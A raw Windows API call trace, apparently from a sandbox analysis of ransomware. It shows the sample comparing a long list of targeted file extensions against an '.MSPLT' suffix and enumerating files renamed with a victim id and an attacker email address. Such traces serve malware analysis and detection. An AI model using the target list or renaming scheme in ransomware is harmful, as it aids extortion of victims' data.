lstrlenW (lpString=".asa") returned 4 [0283.653] lstrcmpiW (lpString1=".asa", lpString2="SPLT") returned -1 [0283.653] lstrlenW (lpString=".asc") returned 4 [0283.653] lstrcmpiW (lpString1=".asc", lpString2="SPLT") returned -1 [0283.653] lstrlenW (lpString=".ascx") returned 5 [0283.653] lstrcmpiW (lpString1=".ascx", lpString2="MSPLT") returned -1 [0283.653] lstrlenW (lpString=".asm") returned 4 [0283.653] lstrcmpiW (lpString1=".asm", lpString2="SPLT") returned -1 [0283.653] lstrlenW (lpString=".asmx") returned 5 [0283.653] lstrcmpiW (lpString1=".asmx", lpString2="MSPLT") returned -1 [0283.653] lstrlenW (lpString=".asp") returned 4 [0283.653] lstrcmpiW (lpString1=".asp", lpString2="SPLT") returned -1 [0283.653] lstrlenW (lpString=".aspx") returned 5 [0283.653] lstrcmpiW (lpString1=".aspx", lpString2="MSPLT") returned -1 [0283.653] lstrlenW (lpString=".asr") returned 4 [0283.653] lstrcmpiW (lpString1=".asr", lpString2="SPLT") returned -1 [0283.653] lstrlenW (lpString=".asx") returned 4 [0283.654] lstrcmpiW (lpString1=".asx", lpString2="SPLT") returned -1 [0283.654] lstrlenW (lpString=".avi") returned 4 [0283.654] lstrcmpiW (lpString1=".avi", lpString2="SPLT") returned -1 [0283.654] lstrlenW (lpString=".avs") returned 4 [0283.654] lstrcmpiW (lpString1=".avs", lpString2="SPLT") returned -1 [0283.654] lstrlenW (lpString=".backup") returned 7 [0283.654] lstrcmpiW (lpString1=".backup", lpString2="].MSPLT") returned -1 [0283.654] lstrlenW (lpString=".bak") returned 4 [0283.654] lstrcmpiW (lpString1=".bak", lpString2="SPLT") returned -1 [0283.654] lstrlenW (lpString=".bay") returned 4 [0283.654] lstrcmpiW (lpString1=".bay", lpString2="SPLT") returned -1 [0283.654] lstrlenW (lpString=".bd") returned 3 [0283.654] lstrcmpiW (lpString1=".bd", lpString2="PLT") returned -1 [0283.654] lstrlenW (lpString=".bin") returned 4 [0283.654] lstrcmpiW (lpString1=".bin", lpString2="SPLT") returned -1 [0283.654] lstrlenW (lpString=".bmp") returned 4 [0283.654] lstrcmpiW (lpString1=".bmp", lpString2="SPLT") returned -1 [0283.654] lstrlenW (lpString=".bz2") returned 4 [0283.654] lstrcmpiW (lpString1=".bz2", lpString2="SPLT") returned -1 [0283.654] lstrlenW (lpString=".c") returned 2 [0283.654] lstrcmpiW (lpString1=".c", lpString2="LT") returned -1 [0283.654] lstrlenW (lpString=".cdr") returned 4 [0283.654] lstrcmpiW (lpString1=".cdr", lpString2="SPLT") returned -1 [0283.654] lstrlenW (lpString=".cer") returned 4 [0283.654] lstrcmpiW (lpString1=".cer", lpString2="SPLT") returned -1 [0283.654] lstrlenW (lpString=".cf") returned 3 [0283.655] lstrcmpiW (lpString1=".cf", lpString2="PLT") returned -1 [0283.655] lstrlenW (lpString=".cfc") returned 4 [0283.655] lstrcmpiW (lpString1=".cfc", lpString2="SPLT") returned -1 [0283.655] lstrlenW (lpString=".cfm") returned 4 [0283.655] lstrcmpiW (lpString1=".cfm", lpString2="SPLT") returned -1 [0283.655] lstrlenW (lpString=".cfml") returned 5 [0283.655] lstrcmpiW (lpString1=".cfml", lpString2="MSPLT") returned -1 [0283.655] lstrlenW (lpString=".cfu") returned 4 [0283.655] lstrcmpiW (lpString1=".cfu", lpString2="SPLT") returned -1 [0283.655] lstrlenW (lpString=".chm") returned 4 [0283.655] lstrcmpiW (lpString1=".chm", lpString2="SPLT") returned -1 [0283.655] lstrlenW (lpString=".cin") returned 4 [0283.655] lstrcmpiW (lpString1=".cin", lpString2="SPLT") returned -1 [0283.655] lstrlenW (lpString=".class") returned 6 [0283.655] lstrcmpiW (lpString1=".class", lpString2=".MSPLT") returned -1 [0283.655] lstrlenW (lpString=".clx") returned 4 [0283.655] lstrcmpiW (lpString1=".clx", lpString2="SPLT") returned -1 [0283.655] lstrlenW (lpString=".config") returned 7 [0283.655] lstrcmpiW (lpString1=".config", lpString2="].MSPLT") returned -1 [0283.655] lstrlenW (lpString=".cpp") returned 4 [0283.655] lstrcmpiW (lpString1=".cpp", lpString2="SPLT") returned -1 [0283.655] lstrlenW (lpString=".cr2") returned 4 [0283.655] lstrcmpiW (lpString1=".cr2", lpString2="SPLT") returned -1 [0283.655] lstrlenW (lpString=".crt") returned 4 [0283.655] lstrcmpiW (lpString1=".crt", lpString2="SPLT") returned -1 [0283.655] lstrlenW (lpString=".crw") returned 4 [0283.655] lstrcmpiW (lpString1=".crw", lpString2="SPLT") returned -1 [0283.656] lstrlenW (lpString=".cs") returned 3 [0283.656] lstrcmpiW (lpString1=".cs", lpString2="PLT") returned -1 [0283.656] lstrlenW (lpString=".css") returned 4 [0283.656] lstrcmpiW (lpString1=".css", lpString2="SPLT") returned -1 [0283.656] lstrlenW (lpString=".csv") returned 4 [0283.656] lstrcmpiW (lpString1=".csv", lpString2="SPLT") returned -1 [0283.656] lstrlenW (lpString=".cub") returned 4 [0283.656] lstrcmpiW (lpString1=".cub", lpString2="SPLT") returned -1 [0283.656] lstrlenW (lpString=".dae") returned 4 [0283.656] lstrcmpiW (lpString1=".dae", lpString2="SPLT") returned -1 [0283.656] lstrlenW (lpString=".dat") returned 4 [0283.656] lstrcmpiW (lpString1=".dat", lpString2="SPLT") returned -1 [0283.656] lstrlenW (lpString=".db") returned 3 [0283.656] lstrcmpiW (lpString1=".db", lpString2="PLT") returned -1 [0283.656] lstrlenW (lpString=".dbf") returned 4 [0283.656] lstrcmpiW (lpString1=".dbf", lpString2="SPLT") returned -1 [0283.656] lstrlenW (lpString=".dbx") returned 4 [0283.656] lstrcmpiW (lpString1=".dbx", lpString2="SPLT") returned -1 [0283.656] lstrlenW (lpString=".dc3") returned 4 [0283.656] lstrcmpiW (lpString1=".dc3", lpString2="SPLT") returned -1 [0283.656] lstrlenW (lpString=".dcm") returned 4 [0283.656] lstrcmpiW (lpString1=".dcm", lpString2="SPLT") returned -1 [0283.656] lstrlenW (lpString=".dcr") returned 4 [0283.656] lstrcmpiW (lpString1=".dcr", lpString2="SPLT") returned -1 [0283.656] lstrlenW (lpString=".der") returned 4 [0283.656] lstrcmpiW (lpString1=".der", lpString2="SPLT") returned -1 [0283.656] lstrlenW (lpString=".dib") returned 4 [0283.657] lstrcmpiW (lpString1=".dib", lpString2="SPLT") returned -1 [0283.657] lstrlenW (lpString=".dic") returned 4 [0283.657] lstrcmpiW (lpString1=".dic", lpString2="SPLT") returned -1 [0283.657] lstrlenW (lpString=".dif") returned 4 [0283.657] lstrcmpiW (lpString1=".dif", lpString2="SPLT") returned -1 [0283.657] lstrlenW (lpString=".divx") returned 5 [0283.657] lstrcmpiW (lpString1=".divx", lpString2="MSPLT") returned -1 [0283.657] lstrlenW (lpString=".djvu") returned 5 [0283.657] lstrcmpiW (lpString1=".djvu", lpString2="MSPLT") returned -1 [0283.657] lstrlenW (lpString=".dng") returned 4 [0283.657] lstrcmpiW (lpString1=".dng", lpString2="SPLT") returned -1 [0283.657] lstrlenW (lpString=".doc") returned 4 [0283.657] lstrcmpiW (lpString1=".doc", lpString2="SPLT") returned -1 [0283.657] lstrlenW (lpString=".docm") returned 5 [0283.657] lstrcmpiW (lpString1=".docm", lpString2="MSPLT") returned -1 [0283.657] lstrlenW (lpString=".docx") returned 5 [0283.657] lstrcmpiW (lpString1=".docx", lpString2="MSPLT") returned -1 [0283.657] lstrlenW (lpString=".dot") returned 4 [0283.657] lstrcmpiW (lpString1=".dot", lpString2="SPLT") returned -1 [0283.657] lstrlenW (lpString=".dotm") returned 5 [0283.657] lstrcmpiW (lpString1=".dotm", lpString2="MSPLT") returned -1 [0283.657] lstrlenW (lpString=".dotx") returned 5 [0283.657] lstrcmpiW (lpString1=".dotx", lpString2="MSPLT") returned -1 [0283.657] lstrlenW (lpString=".dpx") returned 4 [0283.658] lstrcmpiW (lpString1=".dpx", lpString2="SPLT") returned -1 [0283.658] lstrlenW (lpString=".dqy") returned 4 [0283.658] lstrcmpiW (lpString1=".dqy", lpString2="SPLT") returned -1 [0283.658] lstrlenW (lpString=".dsn") returned 4 [0283.658] lstrcmpiW (lpString1=".dsn", lpString2="SPLT") returned -1 [0283.658] lstrlenW (lpString=".dt") returned 3 [0283.658] lstrcmpiW (lpString1=".dt", lpString2="PLT") returned -1 [0283.658] lstrlenW (lpString=".dtd") returned 4 [0283.658] lstrcmpiW (lpString1=".dtd", lpString2="SPLT") returned -1 [0283.658] lstrlenW (lpString=".dwg") returned 4 [0283.658] lstrcmpiW (lpString1=".dwg", lpString2="SPLT") returned -1 [0283.658] lstrlenW (lpString=".dwt") returned 4 [0283.658] lstrcmpiW (lpString1=".dwt", lpString2="SPLT") returned -1 [0283.658] lstrlenW (lpString=".dx") returned 3 [0283.658] lstrcmpiW (lpString1=".dx", lpString2="PLT") returned -1 [0283.658] lstrlenW (lpString=".dxf") returned 4 [0283.658] lstrcmpiW (lpString1=".dxf", lpString2="SPLT") returned -1 [0283.658] lstrlenW (lpString=".edml") returned 5 [0283.658] lstrcmpiW (lpString1=".edml", lpString2="MSPLT") returned -1 [0283.658] lstrlenW (lpString=".efd") returned 4 [0283.658] lstrcmpiW (lpString1=".efd", lpString2="SPLT") returned -1 [0283.658] lstrlenW (lpString=".elf") returned 4 [0283.658] lstrcmpiW (lpString1=".elf", lpString2="SPLT") returned -1 [0283.658] lstrlenW (lpString=".emf") returned 4 [0283.658] lstrcmpiW (lpString1=".emf", lpString2="SPLT") returned -1 [0283.658] lstrlenW (lpString=".emz") returned 4 [0283.659] lstrcmpiW (lpString1=".emz", lpString2="SPLT") returned -1 [0283.659] lstrlenW (lpString=".epf") returned 4 [0283.659] lstrcmpiW (lpString1=".epf", lpString2="SPLT") returned -1 [0283.659] lstrlenW (lpString=".eps") returned 4 [0283.659] lstrcmpiW (lpString1=".eps", lpString2="SPLT") returned -1 [0283.659] lstrlenW (lpString=".epsf") returned 5 [0283.659] lstrcmpiW (lpString1=".epsf", lpString2="MSPLT") returned -1 [0283.659] lstrlenW (lpString=".epsp") returned 5 [0283.659] lstrcmpiW (lpString1=".epsp", lpString2="MSPLT") returned -1 [0283.659] lstrlenW (lpString=".erf") returned 4 [0283.659] lstrcmpiW (lpString1=".erf", lpString2="SPLT") returned -1 [0283.659] lstrlenW (lpString=".exr") returned 4 [0283.659] lstrcmpiW (lpString1=".exr", lpString2="SPLT") returned -1 [0283.659] lstrlenW (lpString=".f4v") returned 4 [0283.659] lstrcmpiW (lpString1=".f4v", lpString2="SPLT") returned -1 [0283.659] lstrlenW (lpString=".fido") returned 5 [0283.659] lstrcmpiW (lpString1=".fido", lpString2="MSPLT") returned -1 [0283.659] lstrlenW (lpString=".flm") returned 4 [0283.659] lstrcmpiW (lpString1=".flm", lpString2="SPLT") returned -1 [0283.659] lstrlenW (lpString=".flv") returned 4 [0283.659] lstrcmpiW (lpString1=".flv", lpString2="SPLT") returned -1 [0283.659] lstrlenW (lpString=".frm") returned 4 [0283.659] lstrcmpiW (lpString1=".frm", lpString2="SPLT") returned -1 [0283.659] lstrlenW (lpString=".fxg") returned 4 [0283.659] lstrcmpiW (lpString1=".fxg", lpString2="SPLT") returned -1 [0283.660] lstrlenW (lpString=".geo") returned 4 [0283.660] lstrcmpiW (lpString1=".geo", lpString2="SPLT") returned -1 [0283.660] lstrlenW (lpString=".gif") returned 4 [0283.660] lstrcmpiW (lpString1=".gif", lpString2="SPLT") returned -1 [0283.660] lstrlenW (lpString=".grs") returned 4 [0283.660] lstrcmpiW (lpString1=".grs", lpString2="SPLT") returned -1 [0283.660] lstrlenW (lpString=".gz") returned 3 [0283.660] lstrcmpiW (lpString1=".gz", lpString2="PLT") returned -1 [0283.660] lstrlenW (lpString=".h") returned 2 [0283.660] lstrcmpiW (lpString1=".h", lpString2="LT") returned -1 [0283.660] lstrlenW (lpString=".hdr") returned 4 [0283.660] lstrcmpiW (lpString1=".hdr", lpString2="SPLT") returned -1 [0283.660] lstrlenW (lpString=".hpp") returned 4 [0283.660] lstrcmpiW (lpString1=".hpp", lpString2="SPLT") returned -1 [0283.660] lstrlenW (lpString=".hta") returned 4 [0283.660] lstrcmpiW (lpString1=".hta", lpString2="SPLT") returned -1 [0283.660] lstrlenW (lpString=".htc") returned 4 [0283.660] lstrcmpiW (lpString1=".htc", lpString2="SPLT") returned -1 [0283.660] lstrlenW (lpString=".htm") returned 4 [0283.660] lstrcmpiW (lpString1=".htm", lpString2="SPLT") returned -1 [0283.660] lstrlenW (lpString=".html") returned 5 [0283.660] lstrcmpiW (lpString1=".html", lpString2="MSPLT") returned -1 [0283.660] lstrlenW (lpString=".icb") returned 4 [0283.660] lstrcmpiW (lpString1=".icb", lpString2="SPLT") returned -1 [0283.660] lstrlenW (lpString=".ics") returned 4 [0283.661] lstrcmpiW (lpString1=".ics", lpString2="SPLT") returned -1 [0283.661] lstrlenW (lpString=".iff") returned 4 [0283.661] lstrcmpiW (lpString1=".iff", lpString2="SPLT") returned -1 [0283.661] lstrlenW (lpString=".inc") returned 4 [0283.661] lstrcmpiW (lpString1=".inc", lpString2="SPLT") returned -1 [0283.661] lstrlenW (lpString=".indd") returned 5 [0283.661] lstrcmpiW (lpString1=".indd", lpString2="MSPLT") returned -1 [0283.661] lstrlenW (lpString=".ini") returned 4 [0283.661] lstrcmpiW (lpString1=".ini", lpString2="SPLT") returned -1 [0283.661] lstrlenW (lpString=".iqy") returned 4 [0283.661] lstrcmpiW (lpString1=".iqy", lpString2="SPLT") returned -1 [0283.661] lstrlenW (lpString=".j2c") returned 4 [0283.661] lstrcmpiW (lpString1=".j2c", lpString2="SPLT") returned -1 [0283.661] lstrlenW (lpString=".j2k") returned 4 [0283.661] lstrcmpiW (lpString1=".j2k", lpString2="SPLT") returned -1 [0283.661] lstrlenW (lpString=".java") returned 5 [0283.661] lstrcmpiW (lpString1=".java", lpString2="MSPLT") returned -1 [0283.661] lstrlenW (lpString=".jp2") returned 4 [0283.661] lstrcmpiW (lpString1=".jp2", lpString2="SPLT") returned -1 [0283.661] lstrlenW (lpString=".jpc") returned 4 [0283.661] lstrcmpiW (lpString1=".jpc", lpString2="SPLT") returned -1 [0283.661] lstrlenW (lpString=".jpe") returned 4 [0283.661] lstrcmpiW (lpString1=".jpe", lpString2="SPLT") returned -1 [0283.661] lstrlenW (lpString=".jpeg") returned 5 [0283.661] lstrcmpiW (lpString1=".jpeg", lpString2="MSPLT") returned -1 [0283.661] lstrlenW (lpString=".jpf") returned 4 [0283.661] lstrcmpiW (lpString1=".jpf", lpString2="SPLT") returned -1 [0283.662] lstrlenW (lpString=".jpg") returned 4 [0283.662] lstrcmpiW (lpString1=".jpg", lpString2="SPLT") returned -1 [0283.662] lstrlenW (lpString=".jpx") returned 4 [0283.662] lstrcmpiW (lpString1=".jpx", lpString2="SPLT") returned -1 [0283.662] lstrlenW (lpString=".js") returned 3 [0283.662] lstrcmpiW (lpString1=".js", lpString2="PLT") returned -1 [0283.662] lstrlenW (lpString=".jsf") returned 4 [0283.662] lstrcmpiW (lpString1=".jsf", lpString2="SPLT") returned -1 [0283.662] lstrlenW (lpString=".json") returned 5 [0283.662] lstrcmpiW (lpString1=".json", lpString2="MSPLT") returned -1 [0283.662] lstrlenW (lpString=".jsp") returned 4 [0283.662] lstrcmpiW (lpString1=".jsp", lpString2="SPLT") returned -1 [0283.662] lstrlenW (lpString=".kdc") returned 4 [0283.662] lstrcmpiW (lpString1=".kdc", lpString2="SPLT") returned -1 [0283.662] lstrlenW (lpString=".kmz") returned 4 [0283.662] lstrcmpiW (lpString1=".kmz", lpString2="SPLT") returned -1 [0283.662] lstrlenW (lpString=".kwm") returned 4 [0283.662] lstrcmpiW (lpString1=".kwm", lpString2="SPLT") returned -1 [0283.662] lstrlenW (lpString=".lasso") returned 6 [0283.662] lstrcmpiW (lpString1=".lasso", lpString2=".MSPLT") returned -1 [0283.662] lstrlenW (lpString=".lbi") returned 4 [0283.662] lstrcmpiW (lpString1=".lbi", lpString2="SPLT") returned -1 [0283.662] lstrlenW (lpString=".lgf") returned 4 [0283.662] lstrcmpiW (lpString1=".lgf", lpString2="SPLT") returned -1 [0283.662] lstrlenW (lpString=".lgp") returned 4 [0283.662] lstrcmpiW (lpString1=".lgp", lpString2="SPLT") returned -1 [0283.662] lstrlenW (lpString=".log") returned 4 [0283.663] lstrcmpiW (lpString1=".log", lpString2="SPLT") returned -1 [0283.663] lstrlenW (lpString=".m1v") returned 4 [0283.663] lstrcmpiW (lpString1=".m1v", lpString2="SPLT") returned -1 [0283.663] lstrlenW (lpString=".m4a") returned 4 [0283.663] lstrcmpiW (lpString1=".m4a", lpString2="SPLT") returned -1 [0283.663] lstrlenW (lpString=".m4v") returned 4 [0283.663] lstrcmpiW (lpString1=".m4v", lpString2="SPLT") returned -1 [0283.663] lstrlenW (lpString=".max") returned 4 [0283.663] lstrcmpiW (lpString1=".max", lpString2="SPLT") returned -1 [0283.663] lstrlenW (lpString=".md") returned 3 [0283.663] lstrcmpiW (lpString1=".md", lpString2="PLT") returned -1 [0283.663] lstrlenW (lpString=".mda") returned 4 [0283.663] lstrcmpiW (lpString1=".mda", lpString2="SPLT") returned -1 [0283.663] lstrlenW (lpString=".mdb") returned 4 [0283.663] lstrcmpiW (lpString1=".mdb", lpString2="SPLT") returned -1 [0283.663] lstrlenW (lpString=".mde") returned 4 [0283.663] lstrcmpiW (lpString1=".mde", lpString2="SPLT") returned -1 [0283.663] lstrlenW (lpString=".mdf") returned 4 [0283.663] lstrcmpiW (lpString1=".mdf", lpString2="SPLT") returned -1 [0283.663] lstrlenW (lpString=".mdw") returned 4 [0283.663] lstrcmpiW (lpString1=".mdw", lpString2="SPLT") returned -1 [0283.663] lstrlenW (lpString=".mef") returned 4 [0283.663] lstrcmpiW (lpString1=".mef", lpString2="SPLT") returned -1 [0283.663] lstrlenW (lpString=".mft") returned 4 [0283.663] lstrcmpiW (lpString1=".mft", lpString2="SPLT") returned -1 [0283.664] lstrlenW (lpString=".mfw") returned 4 [0283.664] lstrcmpiW (lpString1=".mfw", lpString2="SPLT") returned -1 [0283.664] lstrlenW (lpString=".mht") returned 4 [0283.664] lstrcmpiW (lpString1=".mht", lpString2="SPLT") returned -1 [0283.664] lstrlenW (lpString=".mhtml") returned 6 [0283.664] lstrcmpiW (lpString1=".mhtml", lpString2=".MSPLT") returned -1 [0283.664] lstrlenW (lpString=".mka") returned 4 [0283.664] lstrcmpiW (lpString1=".mka", lpString2="SPLT") returned -1 [0283.664] lstrlenW (lpString=".mkidx") returned 6 [0283.665] lstrcmpiW (lpString1=".mkidx", lpString2=".MSPLT") returned -1 [0283.665] lstrlenW (lpString=".mkv") returned 4 [0283.665] lstrcmpiW (lpString1=".mkv", lpString2="SPLT") returned -1 [0283.665] lstrlenW (lpString=".mos") returned 4 [0283.665] lstrcmpiW (lpString1=".mos", lpString2="SPLT") returned -1 [0283.665] lstrlenW (lpString=".mov") returned 4 [0283.665] lstrcmpiW (lpString1=".mov", lpString2="SPLT") returned -1 [0283.665] lstrlenW (lpString=".mp3") returned 4 [0283.665] lstrcmpiW (lpString1=".mp3", lpString2="SPLT") returned -1 [0283.665] lstrlenW (lpString=".mp4") returned 4 [0283.665] lstrcmpiW (lpString1=".mp4", lpString2="SPLT") returned -1 [0283.665] lstrlenW (lpString=".mpeg") returned 5 [0283.665] lstrcmpiW (lpString1=".mpeg", lpString2="MSPLT") returned -1 [0283.665] lstrlenW (lpString=".mpg") returned 4 [0283.665] lstrcmpiW (lpString1=".mpg", lpString2="SPLT") returned -1 [0283.665] lstrlenW (lpString=".mpv") returned 4 [0283.665] lstrcmpiW (lpString1=".mpv", lpString2="SPLT") returned -1 [0283.665] lstrlenW (lpString=".mrw") returned 4 [0283.665] lstrcmpiW (lpString1=".mrw", lpString2="SPLT") returned -1 [0283.665] lstrlenW (lpString=".msg") returned 4 [0283.665] lstrcmpiW (lpString1=".msg", lpString2="SPLT") returned -1 [0283.665] lstrlenW (lpString=".mxl") returned 4 [0283.665] lstrcmpiW (lpString1=".mxl", lpString2="SPLT") returned -1 [0283.665] lstrlenW (lpString=".myd") returned 4 [0283.665] lstrcmpiW (lpString1=".myd", lpString2="SPLT") returned -1 [0283.665] lstrlenW (lpString=".myi") returned 4 [0283.665] lstrcmpiW (lpString1=".myi", lpString2="SPLT") returned -1 [0283.666] lstrlenW (lpString=".nef") returned 4 [0283.666] lstrcmpiW (lpString1=".nef", lpString2="SPLT") returned -1 [0283.666] lstrlenW (lpString=".nrw") returned 4 [0283.666] lstrcmpiW (lpString1=".nrw", lpString2="SPLT") returned -1 [0283.666] lstrlenW (lpString=".obj") returned 4 [0283.666] lstrcmpiW (lpString1=".obj", lpString2="SPLT") returned -1 [0283.666] lstrlenW (lpString=".odb") returned 4 [0283.666] lstrcmpiW (lpString1=".odb", lpString2="SPLT") returned -1 [0283.666] lstrlenW (lpString=".odc") returned 4 [0283.666] lstrcmpiW (lpString1=".odc", lpString2="SPLT") returned -1 [0283.666] lstrlenW (lpString=".odm") returned 4 [0283.666] lstrcmpiW (lpString1=".odm", lpString2="SPLT") returned -1 [0283.666] lstrlenW (lpString=".odp") returned 4 [0283.666] lstrcmpiW (lpString1=".odp", lpString2="SPLT") returned -1 [0283.666] lstrlenW (lpString=".ods") returned 4 [0283.666] lstrcmpiW (lpString1=".ods", lpString2="SPLT") returned -1 [0283.666] lstrlenW (lpString=".oft") returned 4 [0283.666] lstrcmpiW (lpString1=".oft", lpString2="SPLT") returned -1 [0283.666] lstrlenW (lpString=".one") returned 4 [0283.666] lstrcmpiW (lpString1=".one", lpString2="SPLT") returned -1 [0283.666] lstrlenW (lpString=".onepkg") returned 7 [0283.666] lstrcmpiW (lpString1=".onepkg", lpString2="].MSPLT") returned -1 [0283.666] lstrlenW (lpString=".onetoc2") returned 8 [0283.666] lstrcmpiW (lpString1=".onetoc2", lpString2="m].MSPLT") returned -1 [0283.666] lstrlenW (lpString=".opt") returned 4 [0283.666] lstrcmpiW (lpString1=".opt", lpString2="SPLT") returned -1 [0283.667] lstrlenW (lpString=".oqy") returned 4 [0283.667] lstrcmpiW (lpString1=".oqy", lpString2="SPLT") returned -1 [0283.667] lstrlenW (lpString=".orf") returned 4 [0283.667] lstrcmpiW (lpString1=".orf", lpString2="SPLT") returned -1 [0283.667] lstrlenW (lpString=".p12") returned 4 [0283.667] lstrcmpiW (lpString1=".p12", lpString2="SPLT") returned -1 [0283.667] lstrlenW (lpString=".p7b") returned 4 [0283.667] lstrcmpiW (lpString1=".p7b", lpString2="SPLT") returned -1 [0283.667] lstrlenW (lpString=".p7c") returned 4 [0283.667] lstrcmpiW (lpString1=".p7c", lpString2="SPLT") returned -1 [0283.667] lstrlenW (lpString=".pam") returned 4 [0283.667] lstrcmpiW (lpString1=".pam", lpString2="SPLT") returned -1 [0283.667] lstrlenW (lpString=".pbm") returned 4 [0283.667] lstrcmpiW (lpString1=".pbm", lpString2="SPLT") returned -1 [0283.667] lstrlenW (lpString=".pct") returned 4 [0283.667] lstrcmpiW (lpString1=".pct", lpString2="SPLT") returned -1 [0283.667] lstrlenW (lpString=".pcx") returned 4 [0283.667] lstrcmpiW (lpString1=".pcx", lpString2="SPLT") returned -1 [0283.667] lstrlenW (lpString=".pdd") returned 4 [0283.667] lstrcmpiW (lpString1=".pdd", lpString2="SPLT") returned -1 [0283.667] lstrlenW (lpString=".pdf") returned 4 [0283.667] lstrcmpiW (lpString1=".pdf", lpString2="SPLT") returned -1 [0283.667] lstrlenW (lpString=".pdp") returned 4 [0283.667] lstrcmpiW (lpString1=".pdp", lpString2="SPLT") returned -1 [0283.667] lstrlenW (lpString=".pef") returned 4 [0283.668] lstrcmpiW (lpString1=".pef", lpString2="SPLT") returned -1 [0283.668] lstrlenW (lpString=".pem") returned 4 [0283.668] lstrcmpiW (lpString1=".pem", lpString2="SPLT") returned -1 [0283.668] lstrlenW (lpString=".pff") returned 4 [0283.668] lstrcmpiW (lpString1=".pff", lpString2="SPLT") returned -1 [0283.668] lstrlenW (lpString=".pfm") returned 4 [0283.668] lstrcmpiW (lpString1=".pfm", lpString2="SPLT") returned -1 [0283.668] lstrlenW (lpString=".pfx") returned 4 [0283.668] lstrcmpiW (lpString1=".pfx", lpString2="SPLT") returned -1 [0283.668] lstrlenW (lpString=".pgm") returned 4 [0283.668] lstrcmpiW (lpString1=".pgm", lpString2="SPLT") returned -1 [0283.668] lstrlenW (lpString=".php") returned 4 [0283.668] lstrcmpiW (lpString1=".php", lpString2="SPLT") returned -1 [0283.668] lstrlenW (lpString=".php3") returned 5 [0283.668] lstrcmpiW (lpString1=".php3", lpString2="MSPLT") returned -1 [0283.668] lstrlenW (lpString=".php4") returned 5 [0283.668] lstrcmpiW (lpString1=".php4", lpString2="MSPLT") returned -1 [0283.668] lstrlenW (lpString=".php5") returned 5 [0283.668] lstrcmpiW (lpString1=".php5", lpString2="MSPLT") returned -1 [0283.668] lstrlenW (lpString=".phtml") returned 6 [0283.668] lstrcmpiW (lpString1=".phtml", lpString2=".MSPLT") returned 1 [0283.668] lstrlenW (lpString=".pict") returned 5 [0283.668] lstrcmpiW (lpString1=".pict", lpString2="MSPLT") returned -1 [0283.668] lstrlenW (lpString=".pl") returned 3 [0283.668] lstrcmpiW (lpString1=".pl", lpString2="PLT") returned -1 [0283.668] lstrlenW (lpString=".pls") returned 4 [0283.669] lstrcmpiW (lpString1=".pls", lpString2="SPLT") returned -1 [0283.669] lstrlenW (lpString=".pm") returned 3 [0283.669] lstrcmpiW (lpString1=".pm", lpString2="PLT") returned -1 [0283.669] lstrlenW (lpString=".png") returned 4 [0283.669] lstrcmpiW (lpString1=".png", lpString2="SPLT") returned -1 [0283.669] lstrlenW (lpString=".pnm") returned 4 [0283.669] lstrcmpiW (lpString1=".pnm", lpString2="SPLT") returned -1 [0283.669] lstrlenW (lpString=".pot") returned 4 [0283.669] lstrcmpiW (lpString1=".pot", lpString2="SPLT") returned -1 [0283.669] lstrlenW (lpString=".potm") returned 5 [0283.669] lstrcmpiW (lpString1=".potm", lpString2="MSPLT") returned -1 [0283.669] lstrlenW (lpString=".potx") returned 5 [0283.669] lstrcmpiW (lpString1=".potx", lpString2="MSPLT") returned -1 [0283.669] lstrlenW (lpString=".ppa") returned 4 [0283.669] lstrcmpiW (lpString1=".ppa", lpString2="SPLT") returned -1 [0283.669] lstrlenW (lpString=".ppam") returned 5 [0283.669] lstrcmpiW (lpString1=".ppam", lpString2="MSPLT") returned -1 [0283.669] lstrlenW (lpString=".ppm") returned 4 [0283.669] lstrcmpiW (lpString1=".ppm", lpString2="SPLT") returned -1 [0283.669] lstrlenW (lpString=".pps") returned 4 [0283.669] lstrcmpiW (lpString1=".pps", lpString2="SPLT") returned -1 [0283.669] lstrlenW (lpString=".ppsm") returned 5 [0283.669] lstrcmpiW (lpString1=".ppsm", lpString2="MSPLT") returned -1 [0283.669] lstrlenW (lpString=".ppt") returned 4 [0283.669] lstrcmpiW (lpString1=".ppt", lpString2="SPLT") returned -1 [0283.669] lstrlenW (lpString=".pptm") returned 5 [0283.669] lstrcmpiW (lpString1=".pptm", lpString2="MSPLT") returned -1 [0283.670] lstrlenW (lpString=".pptx") returned 5 [0283.670] lstrcmpiW (lpString1=".pptx", lpString2="MSPLT") returned -1 [0283.670] lstrlenW (lpString=".prn") returned 4 [0283.670] lstrcmpiW (lpString1=".prn", lpString2="SPLT") returned -1 [0283.670] lstrlenW (lpString=".ps") returned 3 [0283.670] lstrcmpiW (lpString1=".ps", lpString2="PLT") returned -1 [0283.670] lstrlenW (lpString=".psb") returned 4 [0283.670] lstrcmpiW (lpString1=".psb", lpString2="SPLT") returned -1 [0283.670] lstrlenW (lpString=".psd") returned 4 [0283.670] lstrcmpiW (lpString1=".psd", lpString2="SPLT") returned -1 [0283.670] lstrlenW (lpString=".pst") returned 4 [0283.670] lstrcmpiW (lpString1=".pst", lpString2="SPLT") returned -1 [0283.670] lstrlenW (lpString=".ptx") returned 4 [0283.670] lstrcmpiW (lpString1=".ptx", lpString2="SPLT") returned -1 [0283.670] lstrlenW (lpString=".pub") returned 4 [0283.670] lstrcmpiW (lpString1=".pub", lpString2="SPLT") returned -1 [0283.670] lstrlenW (lpString=".pwm") returned 4 [0283.670] lstrcmpiW (lpString1=".pwm", lpString2="SPLT") returned -1 [0283.670] lstrlenW (lpString=".pxr") returned 4 [0283.670] lstrcmpiW (lpString1=".pxr", lpString2="SPLT") returned -1 [0283.670] lstrlenW (lpString=".py") returned 3 [0283.670] lstrcmpiW (lpString1=".py", lpString2="PLT") returned -1 [0283.670] lstrlenW (lpString=".qt") returned 3 [0283.670] lstrcmpiW (lpString1=".qt", lpString2="PLT") returned -1 [0283.670] FindNextFileW (in: hFindFile=0x48a1b0, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x59b65b6b, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x59b65b6b, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x59b8ac04, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x122e6, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="LOCALI~1.MSP")) returned 1 [0283.671] FindNextFileW (in: hFindFile=0x48a1b0, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x59f90d55, ftCreationTime.dwHighDateTime=0x1d6097d, 